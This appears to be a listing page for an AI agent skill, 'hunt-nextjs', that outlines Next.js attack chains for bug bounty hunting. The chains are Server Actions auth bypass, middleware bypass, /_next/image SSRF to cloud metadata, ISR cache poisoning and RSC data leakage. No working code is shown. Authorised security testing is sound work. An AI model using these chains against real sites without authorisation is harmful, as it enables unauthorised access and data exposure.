Skills

hunt-nextjs

Installation
SKILL.md

HUNT-NEXTJS — Next.js / SSR Framework Vulnerabilities

Crown Jewel Targets

Next.js-specific bugs that bypass auth or reach SSRF = High/Critical.

Highest-value chains:

  • Server Actions auth bypass — Server Actions enforce auth client-side only → call action ID directly → unauthorized data mutation or exfil
  • Middleware bypass via /_next/static/ — middleware skips static asset paths → protected routes accessible via /_next/data/ IDOR
  • /_next/image SSRF — Image optimizer fetches attacker-controlled URL → internal network scan or cloud metadata
  • ISR stale cache poisoning — inject malicious content into a cached page that gets served to all users
  • RSC payload leakage — React Server Component flight data contains server-side props not meant for client

Attack Surface Signals

Installs
9
Repository
elementalsouls/…ughunter
GitHub Stars
2.6K
First Seen
Jun 5, 2026
Security Audits
Gen Agent Trust HubPass
SocketWarn
SnykFail
hunt-nextjs — elementalsouls/claude-bughunter